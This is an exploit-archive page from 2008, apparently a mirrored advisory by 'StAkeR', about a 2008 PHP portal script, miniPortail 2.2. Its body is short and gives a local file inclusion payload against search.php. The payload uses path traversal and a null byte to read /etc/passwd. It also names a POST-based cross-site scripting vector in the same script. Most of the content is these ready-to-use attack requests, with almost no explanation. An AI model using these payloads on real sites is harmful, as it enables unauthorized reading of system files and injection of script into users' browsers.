[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
# Published : 2008-10-23
# Author : StAkeR
# Previous Title : Joomla Component RWCards 3.0.11 Local File Inclusion Vulnerability
# Next Title : MindDezign Photo Gallery 2.2 Arbitrary Add Admin Exploit


/*

   miniPortail <= 2.2 (XSS/LFI) Remote Vulnerabilities
   -------------------------------------------------------
   By StAkeR - StAkeR[at]hotmail[dot]it
   http://www.easy-script.com/scripts-dl/miniportail.zip
   -------------------------------------------------------
   
   -1 Local File Inclusion
   -  search.php?lng=../../../../../../etc/passwd%00
   
   -2 Cross Site Scritping (POST)
   -  search.php (<script>[javascript]</script>)
   
*/

# www.Syue.com [2008-10-23]